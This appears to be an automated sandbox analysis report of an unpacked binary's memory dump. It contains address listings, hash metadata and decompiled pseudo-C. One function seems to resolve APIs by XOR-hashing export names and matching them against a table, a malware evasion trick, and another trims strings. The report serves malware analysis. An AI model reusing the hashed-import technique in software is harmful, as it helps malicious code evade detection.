0x00421c5b
0x00421c1f
0x00421c21
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421bfe
0x00421bfe
0x00421bfe
0x00421c02
0x00000000
0x00000000
0x00421c04
0x00421c05
0x00421c0b
0x00000000
0x00000000
0x00000000
0x00421c0b
0x00000000
0x00421bfe
0x00421de3
0x00421de6
0x00000000
0x00421de6
0x00421bb8
0x00421bba
0x00421bba
0x00421bbd
0x00421bbd
0x00421bc1
0x00000000
0x00000000
0x00421bc3
0x00421bc4
0x00421bc6
0x00000000
0x00000000
0x00000000
0x00421bc6
0x00000000
0x00421bbd
0x00421b50
0x00421b55
0x00421b57
0x00421b59
0x00421b61
0x00421b63
0x00421b69
0x00421b6b
0x00421b6d
0x00421ba7
0x00000000
0x00421ba7
0x00421b6f
0x00421b71
0x00421b97
0x00421b97
0x00421b99
0x00421b9a
0x00421b9f
0x00000000
0x00421b9f
0x00421b73
0x00421b76
0x00421b78
0x00421b7a
0x00000000
0x00000000
0x00421b7c
0x00421b7c
0x00421b7e
0x00421b7e
0x00421b7f
0x00421b84
0x00421b88
0x00421b8a
0x00000000
0x00000000
0x00421b8c
0x00421b90
0x00421b93
0x00421b95
0x00000000
0x00000000
0x00000000
0x00421b95
0x00000000
0x00421b7e
0x00421b39
0x00421b3a
0x00421b3e
0x00000000
0x00000000
0x00000000
0x00421b3e
0x00421ded
0x00421df0
0x00421df6
0x00421df6
0x00421df7
0x00000000
0x00000000
0x00421dfd
0x00421e06
0x00421e0b
0x00421e0e
0x00421e12
0x00000000
0x00000000
0x00421e18
0x00421e1b
0x00421e1f
0x00421e1f
0x00421e20
0x00421e21
0x00421e2b
0x00421e31
0x00421e34
0x00421e36
0x00000000
0x00000000
0x00421e38
0x00421e3b
0x00000000
0x00000000
0x00000000
0x00421e3d
0x00000000
0x00421e1f
0x00421ad0
0x00421ad4
0x00421ad4
0x00421ad8
0x00000000
0x00000000
0x00421ade
0x00421adf
0x00421ae5
0x00000000
0x00000000
0x00421ae7
0x00000000
0x00421ae7
0x00421e42
0x00421e42
0x00421e46
0x00421e46
0x00421e48
0x00000000
0x00000000
0x00421e4e
0x00000000
0x00000000
0x00000000
0x00421e54
0x00421e59
0x00421e5c
0x00421e60
0x00421e62
0x00000000
0x00421e62
0x00421a6f
0x00421a73
0x00421a75
0x00421a75
0x00421a77
0x00421a77
0x00421a7b
0x00000000
0x00000000
0x00421a81
0x00421a82
0x00421a84
0x00000000
0x00000000
0x00421a86
0x00000000
0x00421a86
0x00000000
0x00421e68
0x00421e68
0x00421e6b
0x00421e6f
0x00421e6f
0x00000000
0x00421e77
0x00000000
0x004218fe
0x00421887
0x0042188a
0x0042188c
0x0042188e
0x00000000
0x00000000
0x00421890
0x00421894
0x00421894
0x00421896
0x0042189a
0x0042189d
0x0042189d
0x0042189e
0x004218a3
0x004218a7
0x004218a9
0x00000000
0x00000000
0x004218ab
0x004218af
0x004218b2
0x004218b4
0x00000000
0x00000000
0x00000000
0x004218b4
0x004218b6
0x004218ba
0x004218be
0x00000000
0x004218be
0x00421881
0x0042183f
0x00000000
0x0042183f
0x004217bb
0x004217bb
0x004217be
0x004217d6
0x004217da
0x004217e6
0x004217e6
0x004217ec
0x004217ec
0x004217f1
0x004217f5
0x004217f9
0x004217fb
0x00000000
0x00000000
0x00421801
0x00421804
0x00421806
0x00000000
0x00000000
0x00421808
0x0042180e
0x00421823
0x00421823
0x00421828
0x00000000
0x00000000
0x00000000
0x00000000
0x00421810
0x00421810
0x00421810
0x00421814
0x00000000
0x00000000
0x0042181a
0x0042181b
0x00421821
0x00000000
0x00000000
0x00000000
0x00421821
0x00421e7c
0x00421e7c
0x00421e7f
0x00421e8d
0x00421e81
0x00421e81
0x00421e84
0x00421e84
0x00000000
0x00421e7f
0x00421e97
0x00421e9a
0x00000000
0x00421e9a
0x004217c2
0x004217c4
0x004217c4
0x004217c7
0x004217c7
0x004217cb
0x00000000
0x00000000
0x004217d1
0x004217d2
0x004217d4
0x00000000
0x00000000
0x00000000
0x004217d4
0x00000000
0x004217c7
0x004217a8
0x00000000
0x004217a8
0x0042175e
0x00421784
0x00421784
0x00421786
0x00421787
0x0042178c
0x00000000
0x0042178c
0x00421760
0x00421763
0x00421767
0x00000000
0x00000000
0x00421769
0x0042176b
0x0042176b
0x0042176c
0x00421771
0x00421777
0x00000000
0x00000000
0x00421779
0x0042177d
0x00421782
0x00000000
0x00000000
0x00000000
0x00421782
0x00000000

Strings

@, xrefs: 00421798

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: d340e33686ce711cae7ca4cd733f44f000da6fbe78a10a3324f3e7fe7d45b449
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 8E327D74B083A24BD715CE29948032B7BE26FE6310F5C866FD8918F376DA7D8941C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00409E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00409E70(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t212;
				void* _t214;
				void* _t218;
				void* _t287;
				void* _t289;
				void* _t290;
				void* _t291;
				char* _t324;
				void* _t337;
				void* _t340;
				signed int _t358;
				char _t360;
				intOrPtr _t369;
				intOrPtr _t370;
				void* _t371;
				void* _t372;
				void* _t374;
				void* _t376;
				void* _t391;
				void* _t410;
				intOrPtr* _t438;
				signed int _t528;
				char* _t529;
				void* _t530;
				intOrPtr* _t533;
				void* _t534;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t541;
				intOrPtr _t542;
				void* _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				intOrPtr* _t554;
				intOrPtr _t555;
				void* _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				intOrPtr _t559;
				void* _t561;
				intOrPtr* _t563;
				void* _t564;

				_t512 = __edx;
				_t557 = __edx;
				_t369 = __ecx;
				if(E00434850(E00429640(__ecx, 0), __edx) == 0 ||  *((char*)(E00413930(__ecx, 0, _t530, _t539) + 0xb)) != 0x20) {
					_t212 = E004348C0(E00429640(_t369, 0), _t512);
					__eflags = _t212;
					if(_t212 == 0) {
						L36:
						__eflags = 0;
						return 0;
					} else {
						_t214 = E00413930(_t369, 0, _t530, _t539);
						__eflags =  *((char*)(_t214 + 0xb)) - 0x40;
						if( *((char*)(_t214 + 0xb)) != 0x40) {
							goto L36;
						} else {
							 *((intOrPtr*)(_t563 + 0x10)) = 0x40;
							goto L6;
						}
					}
				} else {
					 *((intOrPtr*)(_t563 + 0x10)) = 0x20;
					L6:
					 *((intOrPtr*)(_t563 + 0x4e8)) = 0;
					 *((intOrPtr*)(_t563 + 0x4ec)) = 0;
					 *((intOrPtr*)(_t563 + 0x4f0)) = 0;
					E004206A0(_t563 + 0x470, _t557, 0);
					E00412370(_t563 + 0x474, _t530, _t539);
					_t218 = E00426EC0(_t563 + 0x474,  *((intOrPtr*)(_t563 + 0x478)), 0);
					E0040AC00(_t563 + 0x47c, 9);
					E0041FDB0(_t563 + 0x480, _t563 + 0x484);
					E00426EC0(_t218,  *((intOrPtr*)(_t563 + 0x488)), 0);
					E00420B10(_t563 + 0x484);
					E00418CA0(_t563 + 0x47c);
					E00420B10(_t563 + 0x474);
					_t391 = _t563 + 0x18c;
					 *((intOrPtr*)(_t391 - 0x10)) = 0;
					 *((char*)(_t391 - 0xc)) = 1;
					 *((intOrPtr*)(_t391 - 8)) = 0;
					 *((intOrPtr*)(_t391 - 4)) = 3;
					E004187A0(_t391);
					_push(1);
					if(E0042CEA0(_t369, _t563 + 0x180,  *((intOrPtr*)(_t563 + 0x46c)), _t563 + 0x484, _t218) != 0) {
						 *((intOrPtr*)(_t563 + 4)) = _t557;
						_t538 = _t563 + 0x1c0;
						_t556 = _t563 + 0x4c4;
						goto L8;
						L8:
						E00418AB0(_t563 + 0x4c4, _t538, 0);
						E0041FDB0(_t563 + 0x4c0, _t556);
						E004237E0(_t563 + 0x4f0,  *((intOrPtr*)(_t563 + 0x4c8)),  *((intOrPtr*)(_t563 + 0x4e8)));
						E00420B10(_t556);
						E00418CA0(_t563 + 0x4bc);
						if(E0042D0E0(_t563 + 0x17c) != 0) {
							goto L8;
						} else {
							_t557 =  *((intOrPtr*)(_t563 + 4));
						}
					}
					E00418CA0(_t563 + 0x18c);
					if( *((char*)(_t563 + 0x180)) != 0) {
						_t555 =  *((intOrPtr*)(_t563 + 0x17c));
						if(_t555 == 0 || _t555 == 0xffffffff) {
							_t360 = 1;
						} else {
							_t360 = 0;
						}
						if(_t360 == 0) {
							E0042CE70(_t555);
						}
					}
					 *((intOrPtr*)(_t563 + 0x17c)) = 0;
					E00420B10(_t563 + 0x46c);
					 *((intOrPtr*)(_t563 + 0x440)) = 0;
					 *((intOrPtr*)(_t563 + 0x444)) = 0;
					 *((intOrPtr*)(_t563 + 0x448)) = 0;
					_t541 = E0042E170(0,  *((intOrPtr*)(_t563 + 0x4e8)));
					 *((intOrPtr*)(_t563 + 0x14)) =  *((intOrPtr*)(_t563 + 0x4e8));
					 *_t563 = _t369;
					 *((intOrPtr*)(_t563 + 4)) = _t557;
					_t558 = 0;
					while(1) {
						_t542 =  ==  ? _t558 : _t541;
						_t533 = E00427600(_t563 + 0x4ec, _t542);
						_t516 = _t533;
						if(E0040A830( *((intOrPtr*)(_t563 + 0x10)), _t533, _t542) == 0) {
							goto L35;
						}
						E004206A0(_t563 + 0x4d0, _t558, 0);
						E00412370(_t563 + 0x4d4, _t533, _t542);
						E00426EC0(E00426EC0(_t563 + 0x4d4,  *((intOrPtr*)(_t563 + 0x4d8)), 0),  *_t533, 0);
						E00420B10(_t563 + 0x4d4);
						E0042A280(_t563 + 0x49c,  *((intOrPtr*)(_t563 + 0x4d8)), 1, 0, 0x80);
						E0042A520(_t563 + 0x494, _t516, _t563 + 0x4a4, 0);
						E00434A20(_t563 + 0x4dc, E00429640(_t563 + 0x4a4, 0));
						E00429510(_t563 + 0x4a0);
						E0042BDC0(_t563 + 0x49c, 0);
						if(E00427620(_t563 + 0x4dc, _t542) != 0) {
							 *((intOrPtr*)(_t563 + 0x4b0)) = _t558;
							_t410 = _t563 + 0x4dc;
							 *((intOrPtr*)(_t410 - 0x28)) = _t558;
							 *((intOrPtr*)(_t410 - 0x24)) = _t558;
							E00427560(_t410, _t533, _t542);
							__eflags =  *((char*)(_t563 + 0x49c));
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E0042BE30(_t563 + 0x498, _t542);
							}
						} else {
							if( *((intOrPtr*)(_t563 + 0x4dc)) > 0) {
								 *((intOrPtr*)(_t563 + 0xc)) = _t533;
								 *((intOrPtr*)(_t563 + 8)) = _t542;
								_t376 = _t563 + 0x4f4;
								do {
									_t554 = E00427600(_t563 + 0x4e0, _t558);
									E00421020(_t554, _t376);
									_t358 = E0042D620( *((intOrPtr*)(_t563 + 0x4f4)), E00426040( *((intOrPtr*)(_t563 + 0x4f4)), 0x7fffffff));
									E00420B10(_t376);
									_t537 = _t358 ^ 0x38ba5c7b;
									_t528 = 0;
									while(_t537 !=  *((intOrPtr*)(0x439440 + _t528 * 4))) {
										_t528 = _t528 + 1;
										if(_t528 < 0x30) {
											continue;
										} else {
											_t529 =  *_t554;
											if(_t529 != 0) {
												 *_t529 = 0;
											}
										}
										goto L27;
									}
									L27:
									_t558 = _t558 + 1;
								} while (_t558 <  *((intOrPtr*)(_t563 + 0x4dc)));
								_t533 =  *((intOrPtr*)(_t563 + 0xc));
								_t558 = 0;
								_t542 =  *((intOrPtr*)(_t563 + 8));
							}
							E004271F0(_t563 + 0x4b4, _t542, E00423EC0(_t563 + 0x4dc));
							E00427560(_t563 + 0x4dc, _t533, _t542);
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E0042BE30(_t563 + 0x498, _t542);
							}
						}
						E00418CA0(_t563 + 0x48c);
						E00420B10(_t563 + 0x4cc);
						if(E00427620(_t563 + 0x4b0, _t542) != 0) {
							E00427560(_t563 + 0x4b0, _t533, _t542);
							goto L35;
						}
						_t370 =  *_t563;
						_t559 =  *((intOrPtr*)(_t563 + 4));
						_t543 = E0042E170(0,  *((intOrPtr*)(_t563 + 0x4b0)));
						E004237E0(_t563 + 0x448,  *_t533,  *((intOrPtr*)(_t563 + 0x440)));
						E004237E0(_t563 + 0x448,  *((intOrPtr*)(E00427600(_t563 + 0x4b4, _t252))),  *((intOrPtr*)(_t563 + 0x440)));
						E00427560(_t563 + 0x4b0, _t533, _t252);
						E00427560(_t563 + 0x4e8, _t533, _t252);
						E004206A0(_t563 + 0x450, _t559, 0);
						E004206A0(_t563 + 0x458, _t559, 0);
						E00426EC0(_t563 + 0x454,  *((intOrPtr*)(E00427600(_t563 + 0x444, 0))), 0);
						E00426EC0(_t563 + 0x45c,  *((intOrPtr*)(E00427600(_t563 + 0x444, 1))), 0);
						E004206A0(_t563 + 0x460, _t559, 0);
						E00412370(_t563 + 0x464, _t533, _t252);
						E00426EC0(E00426EC0(_t563 + 0x464,  *((intOrPtr*)(_t563 + 0x468)), 0),  *((intOrPtr*)(_t563 + 0x458)), 0);
						E00420B10(_t563 + 0x464);
						E0042A280(_t563 + 0x42c,  *((intOrPtr*)(_t563 + 0x468)), 1, 0, 0x80);
						E0042A520(_t563 + 0x424,  *((intOrPtr*)(_t563 + 0x4b0)), _t563 + 0x430, 0);
						__eflags =  *((char*)(_t563 + 0x42c));
						if( *((char*)(_t563 + 0x42c)) != 0) {
							E0042BE30(_t563 + 0x428, _t543);
						}
						E00418CA0(_t563 + 0x41c);
						__eflags = E00429660(_t563 + 0x430);
						if(__eflags == 0) {
							E004206A0(_t563 + 0x3e4, _t559, 0);
							_push(0);
							E00429350(_t563 + 0x3f4);
							_push(0);
							E00429350(_t563 + 0x404);
							_t438 = _t563 + 0x410;
							 *_t438 = 0;
							 *((intOrPtr*)(_t438 + 4)) = 0;
							 *((intOrPtr*)(_t438 + 8)) = 0;
							E00427560(_t438, _t533, _t543);
							E0042A110(_t563 + 0x400);
							_t280 = E0042A110(_t563 + 0x3f0);
							__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x20;
							if( *((intOrPtr*)(_t563 + 0x10)) != 0x20) {
								__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x40;
								if( *((intOrPtr*)(_t563 + 0x10)) == 0x40) {
									_t337 = E004347D0(E00429640(_t563 + 0x434, 0));
									_t280 = _t337 + 0x88;
									__eflags = _t337 + 0x88;
								}
							} else {
								_t280 = E004347D0(E00429640(_t563 + 0x434, 0)) + 0x78;
							}
							_t534 = E00434830(E00429640(_t563 + 0x434, 0),  *_t280);
							 *((intOrPtr*)(_t563 + 0x3ec)) =  *((intOrPtr*)(_t534 + 0x10));
							E00420B30(_t563 + 0x3e8,  *((intOrPtr*)(_t534 + 0xc)), E00434830(E00429640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0xc))));
							_t287 = E00434830(E00429640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x20)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t553 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t374 = _t287;
								do {
									E004237E0(_t563 + 0x418, E00434830(E00429640(_t563 + 0x434, 0),  *((intOrPtr*)(_t374 + _t553 * 4))),  *((intOrPtr*)(_t563 + 0x410)));
									_t553 = _t553 + 1;
									__eflags = _t553 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t553 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t289 = E00434830(E00429640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x24)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t552 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t561 = _t289;
								do {
									E00429670(_t563 + 0x404, E00429650(_t563 + 0x400) + 2);
									 *((short*)(E00429640(_t563 + 0x404, E00429650(_t563 + 0x400) + 0xfffffffe))) =  *(_t561 + _t552 * 2) & 0x0000ffff;
									_t552 = _t552 + 1;
									__eflags = _t552 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t552 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t290 = E00429640(_t563 + 0x434, 0);
							_t523 =  *((intOrPtr*)(_t534 + 0x1c));
							_t291 = E00434830(_t290,  *((intOrPtr*)(_t534 + 0x1c)));
							__eflags =  *((intOrPtr*)(_t534 + 0x14));
							if( *((intOrPtr*)(_t534 + 0x14)) > 0) {
								 *_t563 = _t370;
								_t551 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t372 = _t291;
								do {
									E00429670(_t563 + 0x3f4, E00429650(_t563 + 0x3f0) + 1);
									_t324 = E00429640(_t563 + 0x3f4, E00429650(_t563 + 0x3f0) - 1);
									_t523 = _t324;
									__eflags =  *((intOrPtr*)(_t372 + _t551 * 4));
									_t551 = _t551 + 1;
									 *_t324 = 0 | __eflags > 0x00000000;
									__eflags = _t551 -  *((intOrPtr*)(_t534 + 0x14));
								} while (_t551 <  *((intOrPtr*)(_t534 + 0x14)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							 *_t563 = 0;
							_push(0);
							E00429350(_t563 + 0x150);
							_t550 = _t563 + 4;
							 *((intOrPtr*)(_t550 + 0x158)) = 0;
							 *((intOrPtr*)(_t550 + 0x15c)) = 0;
							 *((intOrPtr*)(_t550 + 0x160)) = 0;
							 *((intOrPtr*)(_t550 + 0x164)) = 0;
							E00410B70(_t550, 0, 0x40);
							E00410B70(_t563 + 0x50, 0, 0x108);
							_t564 = _t563 + 0x18;
							_push(_t370);
							E00433CE0(_t564 + 4, __eflags);
							_push(_t564 + 0x3e4);
							E00434170(_t564 + 4);
							_t371 = _t564 + 0x16c;
							_push(_t371);
							E00433EF0(_t564 + 4);
							_push(_t371);
							_t193 = _t559 + 0x10; // 0x10
							E00429520(_t193);
							E00429510(_t371);
							_t195 = _t559 + 8; // 0x8
							E00420B30(_t195, _t523,  *((intOrPtr*)(_t564 + 0x454)));
							E00420B30(_t559, _t523,  *((intOrPtr*)(_t564 + 0x44c)));
							E00432970(_t371, _t564 + 0x15c, _t534);
							_t461 =  *((intOrPtr*)(_t564 + 0x168));
							__eflags =  *((intOrPtr*)(_t564 + 0x168));
							if( *((intOrPtr*)(_t564 + 0x168)) != 0) {
								E00402A20(_t461, 1);
							}
							E00429510(_t564 + 0x14c);
							E00427560(_t564 + 0x410, _t534, _t550);
							E00429510(_t564 + 0x400);
							E00429510(_t564 + 0x3f0);
							E00420B10(_t564 + 0x3e4);
							E00429510(_t564 + 0x430);
							E00420B10(_t564 + 0x45c);
							E00420B10(_t564 + 0x454);
							E00420B10(_t564 + 0x44c);
							E00427560(_t564 + 0x440, _t534, _t550);
							return 1;
						} else {
							_t340 = E00409E70(_t370, _t559, __eflags);
							E00429510(_t563 + 0x430);
							E00420B10(_t563 + 0x45c);
							E00420B10(_t563 + 0x454);
							E00420B10(_t563 + 0x44c);
							E00427560(_t563 + 0x440, _t533, _t543);
							return _t340;
						}
						goto L60;
						L35:
						_t541 = _t542 + 1;
					}
				}
				L60:
			}

0x00409e70
0x00409e7a
0x00409e7e
0x00409e8e
0x00409eb2
0x00409eb7
0x00409eb9
0x0040a2cc
0x0040a2cc
0x0040a2d8
0x00409ebf
0x00409ec1
0x00409ec6
0x00409eca
0x00000000
0x00409ed0
0x00409ed0
0x00000000
0x00409ed0
0x00409eca
0x00409e9d
0x00409e9d
0x00409ed8
0x00409eda
0x00409ee1
0x00409ee8
0x00409ef7
0x00409f03
0x00409f18
0x00409f2b
0x00409f3f
0x00409f4f
0x00409f56
0x00409f62
0x00409f6e
0x00409f7a
0x00409f83
0x00409f86
0x00409f8a
0x00409f8d
0x00409f94
0x00409f99
0x00409fa9
0x00409fab
0x00409faf
0x00409fb6
0x00409fb6
0x00409fbd
0x00409fc7
0x00409fd4
0x00409fee
0x00409ff5
0x0040a001
0x0040a014
0x00000000
0x0040a016
0x0040a016
0x0040a016
0x0040a014
0x0040a021
0x0040a02e
0x0040a030
0x0040a039
0x0040a044
0x0040a040
0x0040a040
0x0040a040
0x0040a04b
0x0040a04e
0x0040a04e
0x0040a04b
0x0040a053
0x0040a065
0x0040a075
0x0040a07c
0x0040a083
0x0040a08f
0x0040a09f
0x0040a0a3
0x0040a0a6
0x0040a0aa
0x0040a0ac
0x0040a0b0
0x0040a0c0
0x0040a0c2
0x0040a0cf
0x00000000
0x00000000
0x0040a0de
0x0040a0ea
0x0040a10a
0x0040a116
0x0040a132
0x0040a148
0x0040a164
0x0040a170
0x0040a17e
0x0040a191
0x0040a263
0x0040a26a
0x0040a271
0x0040a274
0x0040a277
0x0040a27c
0x0040a284
0x0040a28d
0x0040a28d
0x0040a197
0x0040a19f
0x0040a1a5
0x0040a1ab
0x0040a1af
0x0040a1b6
0x0040a1c3
0x0040a1c8
0x0040a1e4
0x0040a1ed
0x0040a1f2
0x0040a1f8
0x0040a1fa
0x0040a203
0x0040a207
0x00000000
0x0040a209
0x0040a209
0x0040a20d
0x0040a20f
0x0040a20f
0x0040a20d
0x00000000
0x0040a207
0x0040a212
0x0040a212
0x0040a213
0x0040a21c
0x0040a220
0x0040a222
0x0040a222
0x0040a23a
0x0040a246
0x0040a253
0x0040a25c
0x0040a25c
0x0040a253
0x0040a299
0x0040a2a5
0x0040a2b8
0x0040a2c1
0x00000000
0x0040a2c1
0x0040a2e2
0x0040a2e5
0x0040a2ee
0x0040a300
0x0040a322
0x0040a32e
0x0040a33a
0x0040a348
0x0040a356
0x0040a374
0x0040a392
0x0040a3a0
0x0040a3ac
0x0040a3d1
0x0040a3dd
0x0040a3f9
0x0040a40f
0x0040a414
0x0040a41c
0x0040a425
0x0040a425
0x0040a431
0x0040a442
0x0040a444
0x0040a4a3
0x0040a4a8
0x0040a4b1
0x0040a4b6
0x0040a4bf
0x0040a4c6
0x0040a4cd
0x0040a4cf
0x0040a4d2
0x0040a4d5
0x0040a4e1
0x0040a4ed
0x0040a4f2
0x0040a4f7
0x0040a513
0x0040a518
0x0040a52a
0x0040a52f
0x0040a52f
0x0040a52f
0x0040a4f9
0x0040a50e
0x0040a50e
0x0040a54d
0x0040a552
0x0040a57b
0x0040a595
0x0040a59a
0x0040a59e
0x0040a5a0
0x0040a5a3
0x0040a5a3
0x0040a5a5
0x0040a5a9
0x0040a5ab
0x0040a5d4
0x0040a5d9
0x0040a5da
0x0040a5da
0x0040a5df
0x0040a5e2
0x0040a5e2
0x0040a5fb
0x0040a600
0x0040a604
0x0040a606
0x0040a609
0x0040a609
0x0040a60b
0x0040a60f
0x0040a611
0x0040a628
0x0040a64e
0x0040a651
0x0040a652
0x0040a652
0x0040a657
0x0040a65a
0x0040a65a
0x0040a66a
0x0040a671
0x0040a673
0x0040a678
0x0040a67c
0x0040a67e
0x0040a681
0x0040a681
0x0040a683
0x0040a687
0x0040a689
0x0040a6a1
0x0040a6bb
0x0040a6c0
0x0040a6c4
0x0040a6c9
0x0040a6ca
0x0040a6cc
0x0040a6cc
0x0040a6d1
0x0040a6d4
0x0040a6d4
0x0040a6da
0x0040a6dd
0x0040a6e5
0x0040a6ec
0x0040a6f0
0x0040a6f6
0x0040a6fc
0x0040a702
0x0040a70c
0x0040a71d
0x0040a722
0x0040a725
0x0040a72a
0x0040a736
0x0040a73b
0x0040a740
0x0040a747
0x0040a74c
0x0040a751
0x0040a752
0x0040a755
0x0040a75c
0x0040a768
0x0040a76b
0x0040a779
0x0040a785
0x0040a78a
0x0040a791
0x0040a793
0x0040a797
0x0040a797
0x0040a7a3
0x0040a7af
0x0040a7bb
0x0040a7c7
0x0040a7d3
0x0040a7df
0x0040a7eb
0x0040a7f7
0x0040a803
0x0040a80f
0x0040a823
0x0040a446
0x0040a44a
0x0040a458
0x0040a464
0x0040a470
0x0040a47c
0x0040a488
0x0040a499
0x0040a499
0x00000000
0x0040a2c6
0x0040a2c6
0x0040a2c6
0x0040a0ac
0x00000000

Strings

@, xrefs: 0040A513

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: da88451ae9cb3890b12c1f603f51ab1168eadb69b2b3effe1eda13a8c7e5198e
Instruction ID: b85780e5adcd174be06e244b4571cafe66679cb6828152f86a90518932925482
Opcode Fuzzy Hash: da88451ae9cb3890b12c1f603f51ab1168eadb69b2b3effe1eda13a8c7e5198e
Instruction Fuzzy Hash: 5C3275712183949BC734EF21D852BEFB3E4AF90308F40482EA289571D2EF796949C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00424CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00424CA0(signed int* __ecx, intOrPtr* _a4) {
				char _v28;
				unsigned int _v32;
				void* _v36;
				unsigned int _t70;
				char* _t75;
				signed int _t78;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				intOrPtr* _t90;
				signed int _t92;
				void* _t98;
				void* _t99;
				signed int _t101;
				char _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				char* _t111;
				void* _t112;
				signed int _t115;
				char _t116;
				char _t117;
				char _t118;
				char _t119;
				char _t120;
				void* _t122;
				char* _t123;
				char _t133;
				char _t134;
				char _t136;
				char _t137;
				char* _t139;
				void* _t140;
				signed int _t142;
				char _t146;
				signed int _t148;
				signed int _t154;
				unsigned int _t155;
				char _t157;
				char _t158;
				char* _t161;
				char* _t162;
				intOrPtr* _t169;
				unsigned int _t170;
				void* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff0) - 0x14;
				_t70 =  *0x43a24c; // 0xa0d0920
				_t119 =  *0x43a250; // 0x0
				_v32 = _t70;
				_v28 = _t119;
				_t101 =  *__ecx;
				if(_t101 == 0) {
					_t120 = 0;
					_t88 = 0;
				} else {
					_t142 = _t101 & 0x0000000f;
					if(_t142 == 0) {
						L5:
						asm("pxor xmm0, xmm0");
						_t98 =  ~( ~_t142 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [ecx+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb eax, xmm1");
							if(_t70 != 0) {
								break;
							}
							_t142 = _t142 + 0x10;
							if(_t142 < _t98) {
								continue;
							} else {
								if(_t98 >= 0x7fffffff) {
									L11:
									_t88 = 0x7fffffff;
									goto L12;
								} else {
									while( *((char*)(_t98 + _t101)) != 0) {
										_t98 = _t98 + 1;
										if(_t98 < 0x7fffffff) {
											continue;
										} else {
											goto L11;
										}
										goto L18;
									}
									goto L102;
								}
							}
							goto L18;
						}
						asm("bsf ebx, eax");
						_t88 = _t98 + _t142;
						goto L102;
					} else {
						_t88 = 0;
						_t142 =  ~_t142 + 0x10;
						while( *((char*)(_t88 + _t101)) != 0) {
							_t88 = _t88 + 1;
							if(_t88 < _t142) {
								continue;
							} else {
								goto L5;
							}
							goto L18;
						}
						L102:
						if(_t88 > 0) {
							L12:
							_t120 = 0;
							_t155 = _v32;
							_t171 = 0;
							_v36 = _t88;
							while(_t155 != 0) {
								_t86 =  *((intOrPtr*)(_t120 + _t101));
								_t99 = 0;
								while(_t86 !=  *((intOrPtr*)(_t174 + _t99 + 4))) {
									_t99 = _t99 + 1;
									if( *((char*)(_t174 + _t99 + 4)) != 0) {
										continue;
									}
									goto L17;
								}
								_t171 = _t171 + 1;
								_t120 = _t120 + 1;
								if(_t171 < _v36) {
									continue;
								} else {
									break;
								}
								L106:
							}
							L17:
							_t88 = _v36;
						} else {
							_t120 = 0;
						}
						goto L18;
						L93:
						return _t90;
						goto L106;
					}
				}
				L18:
				_t89 = _t88 - 1;
				_t146 = _t88 - _t120;
				if(_t89 >= _t120) {
					_t170 = _v32;
					_v36 = _t120;
					while(_t170 != 0) {
						_t85 =  *((intOrPtr*)(_t89 + _t101));
						_t140 = 0;
						while(_t85 !=  *((intOrPtr*)(_t174 + _t140 + 4))) {
							_t140 = _t140 + 1;
							if( *((char*)(_t174 + _t140 + 4)) != 0) {
								continue;
							}
							goto L24;
						}
						_t89 = _t89 - 1;
						_t146 = _t146 - 1;
						if(_t89 >= _v36) {
							continue;
						} else {
							break;
						}
						goto L93;
					}
					L24:
					_t120 = _v36;
				}
				_t90 = _a4;
				if(_t146 != 0) {
					if(_t101 == 0) {
						_t157 = 0;
					} else {
						_t81 = _t101 & 0x0000000f;
						if(_t81 == 0) {
							L39:
							asm("pxor xmm0, xmm0");
							_t157 =  ~( ~_t81 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [ecx+eax]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ebx, xmm1");
								if(_t90 != 0) {
									break;
